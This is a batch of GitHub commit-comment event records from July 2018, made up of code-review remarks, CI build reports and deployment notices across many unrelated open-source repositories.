{"id":"7996669477","type":"CommitCommentEvent","actor":{"login":"rlqgjq"},"repo":{"name":"minglich/logitech-pubg"},"payload":{"comment":{"id":29783385,"position":null,"line":null,"path":null,"commit_id":"31e652dbd25ffe42c71191fd44cff07216c41b72","created_at":"2018-07-20T18:57:24Z","updated_at":"2018-07-20T18:57:24Z","author_association":"NONE","body":"Thank you every time. @minglich\r\n\r\nI have a question.\r\nWhat is the standard of upm9? \r\n\r\nbasictimes = 1.05\r\nfulltimes = 0.75*0.9\r\nquadrupletimes = 4*1*0.97\r\nfullof4xtimes = 4*0.75\r\n\r\n1.05 ? 0.9 ? 1 ? 0.97 ?"}},"created_at":"2018-07-20T18:57:24Z"}
{"id":"7996670625","type":"CommitCommentEvent","actor":{"login":"athre0z"},"repo":{"name":"KosBeg/disrusm"},"payload":{"comment":{"id":29783386,"position":null,"line":null,"path":null,"commit_id":"751a9f10f402c274122d10311d1d0bf8e9082f7c","created_at":"2018-07-20T18:57:39Z","updated_at":"2018-07-20T18:57:39Z","author_association":"NONE","body":"Heh, good luck with that and thanks! By the way: we really considered writing the whole engine in Rust as well. However, we figured that it would probably be a dumb idea from the \"marketing\" perspective since there are only very few Rust users in the wild yet and the C/C++ people are really, really lazy, so there is no way they'd pull out a Rust compiler even if we'd offer C bindings etc.. Maybe, in version 10 or so, we'll do a rewrite."}},"created_at":"2018-07-20T18:57:39Z"}
{"id":"7996671707","type":"CommitCommentEvent","actor":{"login":"qwIvan"},"repo":{"name":"torvalds/linux"},"payload":{"comment":{"id":29783387,"position":null,"line":null,"path":null,"commit_id":"ac75a041048b8c1f7418e27621ca5efda8571043","created_at":"2018-07-20T18:57:55Z","updated_at":"2018-07-20T18:57:55Z","author_association":"NONE","body":"i2c_hid_get_input: incomplete report (14/65535)"}},"created_at":"2018-07-20T18:57:55Z"}
{"id":"7996672125","type":"CommitCommentEvent","actor":{"login":"zaaraameera2014"},"repo":{"name":"SubZero7748/android_kernel_samsung_grandppltedx"},"payload":{"comment":{"id":29783388,"position":null,"line":null,"path":null,"commit_id":"5ae91427377c7c2708c0d11913e6a18ff4398deb","created_at":"2018-07-20T18:58:01Z","updated_at":"2018-07-20T18:58:01Z","author_association":"NONE","body":"Guii"}},"created_at":"2018-07-20T18:58:01Z"}
{"id":"7996673405","type":"CommitCommentEvent","actor":{"login":"versatran01"},"repo":{"name":"KumarRobotics/camera_base"},"payload":{"comment":{"id":29783391,"position":null,"line":null,"path":null,"commit_id":"d72304898a6412cb77d8dce5597bb5e51a09feb1","created_at":"2018-07-20T18:58:18Z","updated_at":"2018-07-20T18:58:18Z","author_association":"MEMBER","body":"This has an unnecessary dependency on mavros which is not common to anything. \r\nWhat I suggest is to revert this commit, then make \r\n```\r\nvoid ConfigCb(ConfigType& config, int level) \r\n```\r\na virtual function, (also make the destructor virtual).\r\nThen in your flea3 node, you can override the `ConfigCb` and add the extra functions to do the same thing."}},"created_at":"2018-07-20T18:58:18Z"}
{"id":"7996678563","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29783401,"position":null,"line":null,"path":null,"commit_id":"2d029a9105e631b293db1cc4d3b6c052b5769b82","created_at":"2018-07-20T18:59:32Z","updated_at":"2018-07-20T18:59:32Z","author_association":"NONE","body":"Correct-merge-mistake-with-initializing-CoilDesWaterDeltaT (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2321 of 2322 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 627\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.18%25-green.png)</a>\n"}},"created_at":"2018-07-20T18:59:32Z"}
{"id":"7996684067","type":"CommitCommentEvent","actor":{"login":"retry"},"repo":{"name":"flack/quickform"},"payload":{"comment":{"id":29783414,"position":null,"line":null,"path":null,"commit_id":"0a771df44e33c17f18f86b641d202edae4490870","created_at":"2018-07-20T19:00:42Z","updated_at":"2018-07-20T19:00:42Z","author_association":"NONE","body":"Aren't you missing the \r\nrequire_once 'HTML/QuickForm/utils.php';\r\nlines in every changed file?"}},"created_at":"2018-07-20T19:00:42Z"}
{"id":"7996685089","type":"CommitCommentEvent","actor":{"login":"saipsa"},"repo":{"name":"EliasKotlyar/Xiaomi-Dafang-Hacks"},"payload":{"comment":{"id":29783417,"position":null,"line":null,"path":null,"commit_id":"67da745397afc8632b83842eb89a8195d6565484","created_at":"2018-07-20T19:00:54Z","updated_at":"2018-07-20T19:00:54Z","author_association":"NONE","body":"Hey, why are you removing the saved snapshot? \r\n\r\nYou should check if save snapshot is enabled, then file will be present already.\r\n\r\nif save snapshot is not enabled then you should write and remove the file."}},"created_at":"2018-07-20T19:00:54Z"}
{"id":"7996686098","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29783418,"position":null,"line":null,"path":null,"commit_id":"2d029a9105e631b293db1cc4d3b6c052b5769b82","created_at":"2018-07-20T19:01:07Z","updated_at":"2018-07-20T19:01:07Z","author_association":"NONE","body":"Correct-merge-mistake-with-initializing-CoilDesWaterDeltaT (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-20T19:01:07Z"}
{"id":"7996689449","type":"CommitCommentEvent","actor":{"login":"Darco100"},"repo":{"name":"dm3software/DSAL-first-app"},"payload":{"comment":{"id":29783423,"position":5,"line":20,"path":"DSAL/src/DSAL.c","commit_id":"935cbce67d7595d857564430b6f5d791d8781abd","created_at":"2018-07-20T19:01:53Z","updated_at":"2018-07-20T19:01:53Z","author_association":"COLLABORATOR","body":"// dodaję komentarz"}},"created_at":"2018-07-20T19:01:53Z"}
{"id":"7996690832","type":"CommitCommentEvent","actor":{"login":"dbnicholson"},"repo":{"name":"endlessm/mirrorbits"},"payload":{"comment":{"id":29783426,"position":58,"line":65,"path":"Makefile","commit_id":"42bc87fefdeab62f19a61a5dc622648fa40972be","created_at":"2018-07-20T19:02:11Z","updated_at":"2018-07-20T19:02:11Z","author_association":"NONE","body":"I don't know if it's possible via `tar`, but you might want to use a different `sed` delimiter like `,` in case `distdir` has a `/` in it. Also, I think you might want to escape the `.` in `^.` so it only matches a literal `.`."}},"created_at":"2018-07-20T19:02:11Z"}
{"id":"7996694319","type":"CommitCommentEvent","actor":{"login":"ozaslan"},"repo":{"name":"KumarRobotics/camera_base"},"payload":{"comment":{"id":29783438,"position":null,"line":null,"path":null,"commit_id":"d72304898a6412cb77d8dce5597bb5e51a09feb1","created_at":"2018-07-20T19:02:59Z","updated_at":"2018-07-20T19:02:59Z","author_association":"CONTRIBUTOR","body":"This then requires adding the same code to all the flea3 nodes i.e. single, stereo etc. Or can you suggest another way that will save from code repetition?"}},"created_at":"2018-07-20T19:02:59Z"}
{"id":"7996694589","type":"CommitCommentEvent","actor":{"login":"saipsa"},"repo":{"name":"EliasKotlyar/Xiaomi-Dafang-Hacks"},"payload":{"comment":{"id":29783439,"position":null,"line":null,"path":null,"commit_id":"67da745397afc8632b83842eb89a8195d6565484","created_at":"2018-07-20T19:03:02Z","updated_at":"2018-07-20T19:03:02Z","author_association":"NONE","body":"Also there should be locking mechanism as is present in senpicturemail.sh"}},"created_at":"2018-07-20T19:03:02Z"}
{"id":"7996694594","type":"CommitCommentEvent","actor":{"login":"cmcintosh"},"repo":{"name":"cmcintosh/eastwembassy"},"payload":{"comment":{"id":29783440,"position":null,"line":null,"path":null,"commit_id":"1d5822cf16d7b603dc63fd10d70c61c965d1dc2b","created_at":"2018-07-20T19:03:02Z","updated_at":"2018-07-20T19:03:02Z","author_association":"OWNER","body":"Created multidev environment [eastwembassy#ci-1](https://dashboard.pantheon.io/sites/ce5fc8e8-e07f-47e3-a628-572ba7981843#ci-1).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1-eastwembassy.pantheonsite.io/)"}},"created_at":"2018-07-20T19:03:02Z"}
{"id":"7996694615","type":"CommitCommentEvent","actor":{"login":"ahankinson"},"repo":{"name":"DDMAL/diva.js"},"payload":{"comment":{"id":29783441,"position":9,"line":454,"path":"source/js/diva.js","commit_id":"7b1773dace4c7272c844ee5cbbaa3bb8843d31e6","created_at":"2018-07-20T19:03:02Z","updated_at":"2018-07-20T19:03:02Z","author_association":"MEMBER","body":"`const TIMEOUT` -- constants are generally uppercased."}},"created_at":"2018-07-20T19:03:02Z"}
{"id":"7996697561","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29783448,"position":null,"line":null,"path":null,"commit_id":"ed13a0dc8a8ba61ca49c7f6dc438719727fce1c0","created_at":"2018-07-20T19:03:45Z","updated_at":"2018-07-20T19:03:45Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-855](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-855).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-855-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-20T19:03:45Z"}
{"id":"7996702486","type":"CommitCommentEvent","actor":{"login":"dbnicholson"},"repo":{"name":"endlessm/mirrorbits"},"payload":{"comment":{"id":29783458,"position":23,"line":23,"path":"with-temp-gopath.sh","commit_id":"42bc87fefdeab62f19a61a5dc622648fa40972be","created_at":"2018-07-20T19:04:52Z","updated_at":"2018-07-20T19:04:52Z","author_association":"NONE","body":"Probably pedantic, but it might be good to use a different variable for the temporary directory. If `GOPATH` was set externally, there's a possibility you could wipe whatever it pointed to. Another option would be an explicit `unset GOPATH` somewhere before defining the `trap`."}},"created_at":"2018-07-20T19:04:52Z"}
{"id":"7996704866","type":"CommitCommentEvent","actor":{"login":"ahankinson"},"repo":{"name":"DDMAL/diva.js"},"payload":{"comment":{"id":29783465,"position":27,"line":472,"path":"source/js/diva.js","commit_id":"7b1773dace4c7272c844ee5cbbaa3bb8843d31e6","created_at":"2018-07-20T19:05:25Z","updated_at":"2018-07-20T19:05:25Z","author_association":"MEMBER","body":"This should probably be `let` -- you should understand variable scoping and what the different keywords (or absence of them) mean.\r\n\r\nBasically `let` (ES6), `var` (<= ES5) are block-scoped. No keyword is global scoped."}},"created_at":"2018-07-20T19:05:25Z"}
{"id":"7996709976","type":"CommitCommentEvent","actor":{"login":"gcttong"},"repo":{"name":"phac-nml/biohansel"},"payload":{"comment":{"id":29783484,"position":103,"line":73,"path":"bio_hansel/scripts/write_sequence.py","commit_id":"3a135f21c95bf2e361a9fb25f117dbe81d724875","created_at":"2018-07-20T19:06:39Z","updated_at":"2018-07-20T19:06:39Z","author_association":"COLLABORATOR","body":"ok yes this has been addressed in commit f94ac3952d4c5916d5a813f45e12f8b32518ea7f please let me know if this was what you were looking for"}},"created_at":"2018-07-20T19:06:39Z"}
{"id":"7996713778","type":"CommitCommentEvent","actor":{"login":"EricHanLiu"},"repo":{"name":"DDMAL/diva.js"},"payload":{"comment":{"id":29783497,"position":27,"line":472,"path":"source/js/diva.js","commit_id":"7b1773dace4c7272c844ee5cbbaa3bb8843d31e6","created_at":"2018-07-20T19:07:35Z","updated_at":"2018-07-20T19:07:35Z","author_association":"NONE","body":"Yeah I know the differences but figured the timeout shouldn't be changed\nanywhere and its scoped the same as let\n\nOn Fri, Jul 20, 2018 at 3:05 PM Andrew Hankinson <notifications@github.com>\nwrote:\n\n> This should probably be let -- you should understand variable scoping and\n> what the different keywords (or absence of them) mean.\n>\n> Basically let (ES6), var (<= ES5) are block-scoped. No keyword is global\n> scoped.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/DDMAL/diva.js/commit/7b1773dace4c7272c844ee5cbbaa3bb8843d31e6#commitcomment-29783465>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AQ6Y_zgBqPeTL_0fMi4PrV_UWGkmD0ukks5uIin2gaJpZM4VY7x2>\n> .\n>\n"}},"created_at":"2018-07-20T19:07:35Z"}
{"id":"7996715655","type":"CommitCommentEvent","actor":{"login":"flack"},"repo":{"name":"flack/quickform"},"payload":{"comment":{"id":29783500,"position":null,"line":null,"path":null,"commit_id":"0a771df44e33c17f18f86b641d202edae4490870","created_at":"2018-07-20T19:08:03Z","updated_at":"2018-07-20T19:08:03Z","author_association":"OWNER","body":"they shouldn't be needed, since the whole point of this fork is to provide composer integration, so all the class loading is handled via `vendor/autoload.php` "}},"created_at":"2018-07-20T19:08:03Z"}
{"id":"7996716072","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"PerseusDL/canonical-greekLit"},"payload":{"comment":{"id":29783502,"position":null,"line":null,"path":null,"commit_id":"6a382284e293795606dbc197d856c92b1904f097","created_at":"2018-07-20T19:08:10Z","updated_at":"2018-07-20T19:08:10Z","author_association":"NONE","body":"## Global\n\n| Changed            |   Status |\n|:-------------------|---------:|\n| `coverage`         |     0.12 |\n| `metadata_passing` |     2    |\n| `metadata_total`   |    -6    |\n| `texts_total`      |    -4    |\n\n## Units\n\n| Changed                                                 | Status   |\n|:--------------------------------------------------------|:---------|\n| `./data/phi0010/__cts__.xml`                            | Deleted  |\n| `./data/phi0010/tlg001/__cts__.xml`                     | Deleted  |\n| `./data/phi0010/tlg0010/__cts__.xml`                    | Deleted  |\n| `./data/tlg0006/tlg002/__cts__.xml`                     | Deleted  |\n| `./data/tlg0014/tlg002/__cts__.xml`                     | Deleted  |\n| `./data/tlg0014/tlg003/__cts__.xml`                     | Deleted  |\n| `./data/tlg0019/tlg006/tlg0019.tlg006.perseus-grc1.xml` | Deleted  |\n| `./data/tlg0035/tlg001/tlg0035.tlg001.perseus-grc1.xml` | Deleted  |\n| `./data/tlg0035/tlg002/tlg0035.tlg002.perseus-grc1.xml` | Deleted  |\n| `./data/tlg0086/tlg045/tlg0086.tlg045.perseus-grc1.xml` | Deleted  |\n| `./data/tlg0006/tlg011/__cts__.xml`                     | Passing  |\n| `./data/tlg0019/tlg006/__cts__.xml`                     | Passing  |\n| `./data/tlg0086/tlg045/__cts__.xml`                     | Passing  |\n\n*[Hook UI build recap](http://ci.perseids.org/repo/PerseusDL/canonical-greekLit/4472)*\n"}},"created_at":"2018-07-20T19:08:10Z"}
{"id":"7996717757","type":"CommitCommentEvent","actor":{"login":"EricHanLiu"},"repo":{"name":"DDMAL/diva.js"},"payload":{"comment":{"id":29783507,"position":27,"line":472,"path":"source/js/diva.js","commit_id":"7b1773dace4c7272c844ee5cbbaa3bb8843d31e6","created_at":"2018-07-20T19:08:35Z","updated_at":"2018-07-20T19:08:35Z","author_association":"NONE","body":"Oh I only saw the email so if you were referring to a different variable my\nbad\n\nOn Fri, Jul 20, 2018 at 3:07 PM Eric Liu <ericliu404@gmail.com> wrote:\n\n> Yeah I know the differences but figured the timeout shouldn't be changed\n> anywhere and its scoped the same as let\n>\n> On Fri, Jul 20, 2018 at 3:05 PM Andrew Hankinson <notifications@github.com>\n> wrote:\n>\n>> This should probably be let -- you should understand variable scoping\n>> and what the different keywords (or absence of them) mean.\n>>\n>> Basically let (ES6), var (<= ES5) are block-scoped. No keyword is global\n>> scoped.\n>>\n>> —\n>> You are receiving this because you authored the thread.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/DDMAL/diva.js/commit/7b1773dace4c7272c844ee5cbbaa3bb8843d31e6#commitcomment-29783465>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/AQ6Y_zgBqPeTL_0fMi4PrV_UWGkmD0ukks5uIin2gaJpZM4VY7x2>\n>> .\n>>\n>\n"}},"created_at":"2018-07-20T19:08:35Z"}
{"id":"7996720026","type":"CommitCommentEvent","actor":{"login":"ixmatus"},"repo":{"name":"natefaubion/purescript-psa-utils"},"payload":{"comment":{"id":29783511,"position":null,"line":null,"path":null,"commit_id":"9a402fef653ab2417b475468b5df1789dff7e85c","created_at":"2018-07-20T19:09:10Z","updated_at":"2018-07-20T19:09:10Z","author_association":"NONE","body":":+1: "}},"created_at":"2018-07-20T19:09:10Z"}
{"id":"7996721322","type":"CommitCommentEvent","actor":{"login":"retry"},"repo":{"name":"flack/quickform"},"payload":{"comment":{"id":29783520,"position":null,"line":null,"path":null,"commit_id":"0a771df44e33c17f18f86b641d202edae4490870","created_at":"2018-07-20T19:09:29Z","updated_at":"2018-07-20T19:09:29Z","author_association":"NONE","body":"cool cool. I forgot all about autoload.  I had merely diffed Pear versions 3.2.14 and 3.2.16 to compare to your work.  I will integrate into some live projects now and report back"}},"created_at":"2018-07-20T19:09:29Z"}
{"id":"7996721620","type":"CommitCommentEvent","actor":{"login":"renatofdds"},"repo":{"name":"politza/pdf-tools"},"payload":{"comment":{"id":29783521,"position":null,"line":null,"path":null,"commit_id":"086fa62bbfc6e4b3353e6f149e360e02edac57ed","created_at":"2018-07-20T19:09:33Z","updated_at":"2018-07-20T19:09:33Z","author_association":"NONE","body":"Please merge this, it fixes the issue."}},"created_at":"2018-07-20T19:09:33Z"}
{"id":"7996727190","type":"CommitCommentEvent","actor":{"login":"lattera"},"repo":{"name":"HardenedBSD/hardenedbsd-ports"},"payload":{"comment":{"id":29783532,"position":null,"line":null,"path":null,"commit_id":"0304ca8b463c9a5efe4a22111ff4febfcf84728c","created_at":"2018-07-20T19:10:53Z","updated_at":"2018-07-20T19:10:53Z","author_association":"MEMBER","body":"Thanks for fixing this! With a change as large as this, could you please open a ticket first?"}},"created_at":"2018-07-20T19:10:53Z"}
{"id":"7996727219","type":"CommitCommentEvent","actor":{"login":"harsha2869"},"repo":{"name":"harsha2869/fsd"},"payload":{"comment":{"id":29783533,"position":null,"line":null,"path":null,"commit_id":"d49283061ede9cb9c0dc182d92c9f89429b51edd","created_at":"2018-07-20T19:10:54Z","updated_at":"2018-07-20T19:10:54Z","author_association":"OWNER","body":"This is the first commit"}},"created_at":"2018-07-20T19:10:54Z"}
{"id":"7996730384","type":"CommitCommentEvent","actor":{"login":"baylessj"},"repo":{"name":"purduesigbots/pros-docs"},"payload":{"comment":{"id":29783536,"position":36,"line":36,"path":"v5/okapi/tutorials/concepts/factories.rst","commit_id":"433b936353946695a78b4b997a57a253560ffa00","created_at":"2018-07-20T19:11:40Z","updated_at":"2018-07-20T19:11:40Z","author_association":"CONTRIBUTOR","body":"I'm aware, I just figured I would avoid using any factories in this example to make it look really gross and further encourage users to use the factories. Might be a little excessive, but helped give me an appreciation for how much easier the factories are when I was writing the example code."}},"created_at":"2018-07-20T19:11:40Z"}
{"id":"7996731415","type":"CommitCommentEvent","actor":{"login":"baylessj"},"repo":{"name":"purduesigbots/pros-docs"},"payload":{"comment":{"id":29783538,"position":21,"line":21,"path":"v5/okapi/tutorials/concepts/factories.rst","commit_id":"433b936353946695a78b4b997a57a253560ffa00","created_at":"2018-07-20T19:11:54Z","updated_at":"2018-07-20T19:11:54Z","author_association":"CONTRIBUTOR","body":"Correct, I'll fix that"}},"created_at":"2018-07-20T19:11:54Z"}
{"id":"7996731433","type":"CommitCommentEvent","actor":{"login":"Georgie99"},"repo":{"name":"Georgie99/CSSI-Project"},"payload":{"comment":{"id":29783539,"position":null,"line":null,"path":null,"commit_id":"38b93cc246e1fc0a81636af7164b0d80de831d1f","created_at":"2018-07-20T19:11:55Z","updated_at":"2018-07-20T19:11:55Z","author_association":"OWNER","body":"Ignored pyc files because they are generated and should not be in git. "}},"created_at":"2018-07-20T19:11:55Z"}
{"id":"7996739923","type":"CommitCommentEvent","actor":{"login":"jzabroski"},"repo":{"name":"RamblingCookieMonster/PowerShell"},"payload":{"comment":{"id":29783554,"position":1,"line":1,"path":".build/WFTools.psm1","commit_id":"e88eadaf394bf9923954da388ca2fb5038180053","created_at":"2018-07-20T19:13:57Z","updated_at":"2018-07-20T19:13:57Z","author_association":"NONE","body":"@RamblingCookieMonster  This is probably the greatest hack in the history of mankind.  Way better than psd1 files!!"}},"created_at":"2018-07-20T19:13:57Z"}
{"id":"7996744547","type":"CommitCommentEvent","actor":{"login":"ksandkov"},"repo":{"name":"ksandkov/django-voodp-store"},"payload":{"comment":{"id":29783569,"position":19,"line":19,"path":"mainpage/views.py","commit_id":"028d9b7bcded3e3f68df3f5430573f9106838a57","created_at":"2018-07-20T19:15:06Z","updated_at":"2018-07-20T19:15:06Z","author_association":"OWNER","body":"Точно, спасибо. Кроме того, оно и не нужно уже по итогу."}},"created_at":"2018-07-20T19:15:06Z"}
{"id":"7996745016","type":"CommitCommentEvent","actor":{"login":"ruanyl"},"repo":{"name":"ruanyl/vim-sort-imports"},"payload":{"comment":{"id":29783572,"position":17,"line":27,"path":"autoload/import_sort.vim","commit_id":"f31a7addec226c67c3d75bb6fd33f7501c6362c6","created_at":"2018-07-20T19:15:12Z","updated_at":"2018-07-20T19:15:12Z","author_association":"OWNER","body":"sorry, what's your point here? This commit is based on: https://github.com/renke/import-sort/commit/3af0216638355697be0bb768d3b6281b5133c5be"}},"created_at":"2018-07-20T19:15:12Z"}
{"id":"7996746989","type":"CommitCommentEvent","actor":{"login":"origindesign"},"repo":{"name":"origindesign/skitaos"},"payload":{"comment":{"id":29783580,"position":null,"line":null,"path":null,"commit_id":"d7cc159eaa284212eb656afe0e684b946e073784","created_at":"2018-07-20T19:15:40Z","updated_at":"2018-07-20T19:15:40Z","author_association":"OWNER","body":"Created multidev environment [ski-taos#ci-40](https://dashboard.pantheon.io/sites/22e63f3f-bdff-4894-a158-a29f219020d1#ci-40).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-40-ski-taos.pantheonsite.io/)"}},"created_at":"2018-07-20T19:15:40Z"}
{"id":"7996747664","type":"CommitCommentEvent","actor":{"login":"EricHanLiu"},"repo":{"name":"DDMAL/diva.js"},"payload":{"comment":{"id":29783581,"position":27,"line":472,"path":"source/js/diva.js","commit_id":"7b1773dace4c7272c844ee5cbbaa3bb8843d31e6","created_at":"2018-07-20T19:15:50Z","updated_at":"2018-07-20T19:15:50Z","author_association":"NONE","body":"`t` is defined higher up with `let`."}},"created_at":"2018-07-20T19:15:50Z"}
{"id":"7996751675","type":"CommitCommentEvent","actor":{"login":"bhp-class"},"repo":{"name":"bhp-class/all-code"},"payload":{"comment":{"id":29783585,"position":null,"line":null,"path":null,"commit_id":"bcb0aef0fc1e05459b6f97a48b6e6e104604d8e0","created_at":"2018-07-20T19:16:53Z","updated_at":"2018-07-20T19:16:53Z","author_association":"OWNER","body":"This fixes issue #2 "}},"created_at":"2018-07-20T19:16:53Z"}
{"id":"7996752597","type":"CommitCommentEvent","actor":{"login":"retry"},"repo":{"name":"flack/quickform"},"payload":{"comment":{"id":29783586,"position":null,"line":null,"path":null,"commit_id":"0a771df44e33c17f18f86b641d202edae4490870","created_at":"2018-07-20T19:17:07Z","updated_at":"2018-07-20T19:17:07Z","author_association":"NONE","body":"No problems here.  I'm going to get this into production post haste."}},"created_at":"2018-07-20T19:17:07Z"}
{"id":"7996753149","type":"CommitCommentEvent","actor":{"login":"StephenWeatherford"},"repo":{"name":"aakashthakkar/vscode-docker"},"payload":{"comment":{"id":29783587,"position":null,"line":null,"path":null,"commit_id":"5d060bc2ebc0f286edb1f3f3b3379884c710765e","created_at":"2018-07-20T19:17:15Z","updated_at":"2018-07-20T19:17:15Z","author_association":"NONE","body":"@aakashthakkar Aakash, we really appreciate your willingness to provide a fix for this. I've taken a look, and would prefer not to merge this code for the following reasons:\r\n1) We feel that \"Restart\" is reasonable verbiage for a stopped container. Also, that same command is used at the parent level and in the command palette, and it would be confusing if we had separate Restart and Stop commands based just on state\r\n2) If we did need to separate them out, we would need to do so in a different way than you have done here.\r\n\r\nI do agree that the usage of \"container.start\" to mean \"run\" a container is confusing vs \"container.restart\", but the public menus use the correct docker notation of \"Run\" vs \"Restart\", and to change the menu names now could have an impact of dependencies.\r\n\r\nAgain, appreciate the time you put into this.\r\n- Stephen"}},"created_at":"2018-07-20T19:17:15Z"}
{"id":"7996755825","type":"CommitCommentEvent","actor":{"login":"luisv79"},"repo":{"name":"luisv79/luisv79.github.io"},"payload":{"comment":{"id":29783590,"position":2,"line":1,"path":"CNAME","commit_id":"edc41eda83bb1aebf4c7a993a1c0c6397e0e2dbe","created_at":"2018-07-20T19:17:54Z","updated_at":"2018-07-20T19:17:54Z","author_association":"OWNER","body":"nuevo dominio"}},"created_at":"2018-07-20T19:17:54Z"}
{"id":"7996765105","type":"CommitCommentEvent","actor":{"login":"wolfsokta"},"repo":{"name":"RavenProject/Ravencoin"},"payload":{"comment":{"id":29783604,"position":null,"line":null,"path":null,"commit_id":"3116a09d0f64c56c11b6bd962a1e519371f75ab3","created_at":"2018-07-20T19:20:14Z","updated_at":"2018-07-20T19:20:14Z","author_association":"COLLABORATOR","body":"\"Forsale\" could be \"available\" and \"forsale_price\" could be \"asking_price\""}},"created_at":"2018-07-20T19:20:14Z"}
{"id":"7996766170","type":"CommitCommentEvent","actor":{"login":"micahu"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29783610,"position":99,"line":57,"path":"contracts/Splitter.sol","commit_id":"e7bf72a4462d74ff70a26166e95ef9a732f0dace","created_at":"2018-07-20T19:20:29Z","updated_at":"2018-07-20T19:20:29Z","author_association":"OWNER","body":"ah, thank you. totally forgot that ```address.balance``` was a thing."}},"created_at":"2018-07-20T19:20:29Z"}
{"id":"7996767152","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29783611,"position":null,"line":null,"path":null,"commit_id":"64e8528116a3715c24ddaa67e0a7e15a6687f653","created_at":"2018-07-20T19:20:45Z","updated_at":"2018-07-20T19:20:45Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-863](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-863).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-863-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-20T19:20:45Z"}
{"id":"7996776598","type":"CommitCommentEvent","actor":{"login":"jwiegley"},"repo":{"name":"rycee/home-manager"},"payload":{"comment":{"id":29783622,"position":116,"line":116,"path":"modules/misc/nixpkgs.nix","commit_id":"7417d8e86e9b1bfa47482f29604315f5ec2696bf","created_at":"2018-07-20T19:23:03Z","updated_at":"2018-07-20T19:23:03Z","author_association":"CONTRIBUTOR","body":"Yes, all fixed, thanks for your patience!"}},"created_at":"2018-07-20T19:23:03Z"}
{"id":"7996802632","type":"CommitCommentEvent","actor":{"login":"hexkyz"},"repo":{"name":"Atmosphere-NX/Atmosphere"},"payload":{"comment":{"id":29783683,"position":13,"line":126,"path":"fusee/fusee-primary/src/main.c","commit_id":"3db9ce32faa07466fd40ab003e04a6b9553f96bf","created_at":"2018-07-20T19:29:24Z","updated_at":"2018-07-20T19:29:24Z","author_association":"COLLABORATOR","body":"Yes, it does."}},"created_at":"2018-07-20T19:29:24Z"}
{"id":"7996807483","type":"CommitCommentEvent","actor":{"login":"dlharp"},"repo":{"name":"spring-cloud/spring-cloud-aws"},"payload":{"comment":{"id":29783699,"position":null,"line":null,"path":null,"commit_id":"793f1461b8a272070d9b66ef7ba4c478b57a1731","created_at":"2018-07-20T19:30:36Z","updated_at":"2018-07-20T19:30:36Z","author_association":"NONE","body":"Can this fix be put in the 1.2.x line?"}},"created_at":"2018-07-20T19:30:36Z"}
{"id":"7996808012","type":"CommitCommentEvent","actor":{"login":"flack"},"repo":{"name":"flack/quickform"},"payload":{"comment":{"id":29783700,"position":null,"line":null,"path":null,"commit_id":"0a771df44e33c17f18f86b641d202edae4490870","created_at":"2018-07-20T19:30:43Z","updated_at":"2018-07-20T19:30:43Z","author_association":"OWNER","body":"done: https://github.com/flack/quickform/releases/tag/v3.3.4"}},"created_at":"2018-07-20T19:30:43Z"}
{"id":"7996809954","type":"CommitCommentEvent","actor":{"login":"jmtatsch"},"repo":{"name":"EliasKotlyar/Xiaomi-Dafang-Hacks"},"payload":{"comment":{"id":29783703,"position":null,"line":null,"path":null,"commit_id":"67da745397afc8632b83842eb89a8195d6565484","created_at":"2018-07-20T19:31:12Z","updated_at":"2018-07-20T19:31:12Z","author_association":"COLLABORATOR","body":"It should work no matter if save snapshot is enabled or not. Hmm you are right, i should use a temp file name."}},"created_at":"2018-07-20T19:31:12Z"}
